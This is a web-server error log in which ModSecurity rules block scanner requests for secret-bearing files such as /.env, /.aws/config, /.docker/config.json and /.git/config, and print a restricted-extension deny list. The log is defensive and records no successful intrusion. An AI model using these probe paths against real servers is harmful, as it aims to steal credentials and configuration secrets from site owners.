[Sat Nov 29 10:52:19.692902 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/config"] [unique_id "aSrCUxuHESEEqrci5wSNpwAAAAw"]
[Sat Nov 29 10:52:19.693131 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/config"] [unique_id "aSrCUxuHESEEqrci5wSNpwAAAAw"]
[Sat Nov 29 10:52:21.546029 2025] [:error] [pid 398572] [client 3.8.164.39:43082] [client 3.8.164.39] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.docker/config.json"] [unique_id "aSrCVVzUmGeGPC4NGsL92AAAAAY"]
[Sat Nov 29 10:52:21.546238 2025] [:error] [pid 398572] [client 3.8.164.39:43082] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.docker/config.json"] [unique_id "aSrCVVzUmGeGPC4NGsL92AAAAAY"]
[Sat Nov 29 10:52:21.546467 2025] [:error] [pid 398572] [client 3.8.164.39:43082] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.docker/config.json"] [unique_id "aSrCVVzUmGeGPC4NGsL92AAAAAY"]
[Sat Nov 29 10:52:22.571442 2025] [:error] [pid 398572] [client 3.8.164.39:43082] [client 3.8.164.39] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/debug.log"] [unique_id "aSrCVlzUmGeGPC4NGsL92QAAAAY"]
[Sat Nov 29 10:52:22.571796 2025] [:error] [pid 398572] [client 3.8.164.39:43082] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/debug.log"] [unique_id "aSrCVlzUmGeGPC4NGsL92QAAAAY"]
[Sat Nov 29 10:52:22.572040 2025] [:error] [pid 398572] [client 3.8.164.39:43082] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/debug.log"] [unique_id "aSrCVlzUmGeGPC4NGsL92QAAAAY"]
[Sat Nov 29 10:52:22.763674 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSrCVhuHESEEqrci5wSNrAAAAAw"]
[Sat Nov 29 10:52:22.763914 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSrCVhuHESEEqrci5wSNrAAAAAw"]
[Sat Nov 29 10:52:22.764125 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSrCVhuHESEEqrci5wSNrAAAAAw"]
[Sat Nov 29 10:52:23.098786 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/tools/.env"] [unique_id "aSrCVxuHESEEqrci5wSNrQAAAAw"]
[Sat Nov 29 10:52:23.099028 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/tools/.env"] [unique_id "aSrCVxuHESEEqrci5wSNrQAAAAw"]
[Sat Nov 29 10:52:23.099256 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/tools/.env"] [unique_id "aSrCVxuHESEEqrci5wSNrQAAAAw"]
[Sat Nov 29 10:52:24.647242 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/errors.log"] [unique_id "aSrCWBuHESEEqrci5wSNrwAAAAw"]
[Sat Nov 29 10:52:24.647621 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/errors.log"] [unique_id "aSrCWBuHESEEqrci5wSNrwAAAAw"]
[Sat Nov 29 10:52:24.647848 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/errors.log"] [unique_id "aSrCWBuHESEEqrci5wSNrwAAAAw"]
[Sat Nov 29 13:37:27.137975 2025] [:error] [pid 398572] [client 204.76.203.25:43268] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSrpB1zUmGeGPC4NGsL-SwAAAAY"]
[Sat Nov 29 13:37:27.138277 2025] [:error] [pid 398572] [client 204.76.203.25:43268] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSrpB1zUmGeGPC4NGsL-SwAAAAY"]
[Sat Nov 29 13:37:27.138481 2025] [:error] [pid 398572] [client 204.76.203.25:43268] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSrpB1zUmGeGPC4NGsL-SwAAAAY"]
[Sat Nov 29 13:43:13.794289 2025] [:error] [pid 406833] [client 45.139.104.171:35456] [client 45.139.104.171] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSrqYWSaoKqaTAweeOm1CAAAAAE"]
[Sat Nov 29 13:43:13.794646 2025] [:error] [pid 406833] [client 45.139.104.171:35456] [client 45.139.104.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSrqYWSaoKqaTAweeOm1CAAAAAE"]
[Sat Nov 29 13:43:13.794818 2025] [:error] [pid 406833] [client 45.139.104.171:35456] [client 45.139.104.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSrqYWSaoKqaTAweeOm1CAAAAAE"]
[Sun Nov 30 04:00:45.509144 2025] [:error] [pid 420133] [client 34.170.165.171:47968] [client 34.170.165.171] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSuzXffwd7-miQKNV8YTswAAAAE"]
[Sun Nov 30 04:00:45.509491 2025] [:error] [pid 420133] [client 34.170.165.171:47968] [client 34.170.165.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSuzXffwd7-miQKNV8YTswAAAAE"]
[Sun Nov 30 04:00:45.509725 2025] [:error] [pid 420133] [client 34.170.165.171:47968] [client 34.170.165.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSuzXffwd7-miQKNV8YTswAAAAE"]
[Sun Nov 30 05:49:08.467210 2025] [authz_core:error] [pid 420464] [client 206.81.24.227:46594] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Nov 30 05:49:10.547488 2025] [:error] [pid 421121] [client 206.81.24.227:51648] [client 206.81.24.227] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSvMxloLn9vgVb4y1wTXDgAAAAo"]
[Sun Nov 30 05:49:10.547847 2025] [:error] [pid 421121] [client 206.81.24.227:51648] [client 206.81.24.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSvMxloLn9vgVb4y1wTXDgAAAAo"]
[Sun Nov 30 05:49:10.548151 2025] [:error] [pid 421121] [client 206.81.24.227:51648] [client 206.81.24.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSvMxloLn9vgVb4y1wTXDgAAAAo"]
[Sun Nov 30 05:49:11.037517 2025] [:error] [pid 421119] [client 206.81.24.227:51662] [client 206.81.24.227] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSvMx2rgxAKq5wr-vwxzdgAAAAY"]
[Sun Nov 30 05:49:11.037851 2025] [:error] [pid 421119] [client 206.81.24.227:51662] [client 206.81.24.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSvMx2rgxAKq5wr-vwxzdgAAAAY"]
[Sun Nov 30 05:49:11.038069 2025] [:error] [pid 421119] [client 206.81.24.227:51662] [client 206.81.24.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSvMx2rgxAKq5wr-vwxzdgAAAAY"]
[Sun Nov 30 05:49:12.088209 2025] [:error] [pid 421120] [client 206.81.24.227:51670] [client 206.81.24.227] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSvMyF1RgwzjQxTFQvL8OAAAAAg"]
[Sun Nov 30 05:49:12.088442 2025] [:error] [pid 421120] [client 206.81.24.227:51670] [client 206.81.24.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSvMyF1RgwzjQxTFQvL8OAAAAAg"]
[Sun Nov 30 05:49:12.088657 2025] [:error] [pid 421120] [client 206.81.24.227:51670] [client 206.81.24.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSvMyF1RgwzjQxTFQvL8OAAAAAg"]
[Sun Nov 30 06:54:41.219693 2025] [:error] [pid 420136] [client 204.76.203.25:53820] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSvcIdiFrAxD373c7Pff5QAAAAQ"]
[Sun Nov 30 06:54:41.219989 2025] [:error] [pid 420136] [client 204.76.203.25:53820] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSvcIdiFrAxD373c7Pff5QAAAAQ"]
[Sun Nov 30 06:54:41.220178 2025] [:error] [pid 420136] [client 204.76.203.25:53820] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSvcIdiFrAxD373c7Pff5QAAAAQ"]
[Sun Nov 30 08:08:18.317783 2025] [authz_core:error] [pid 420464] [client 209.38.248.17:56536] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Nov 30 08:08:20.317456 2025] [:error] [pid 421119] [client 209.38.248.17:56566] [client 209.38.248.17] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSvtZGrgxAKq5wr-vwxzjAAAAAY"]
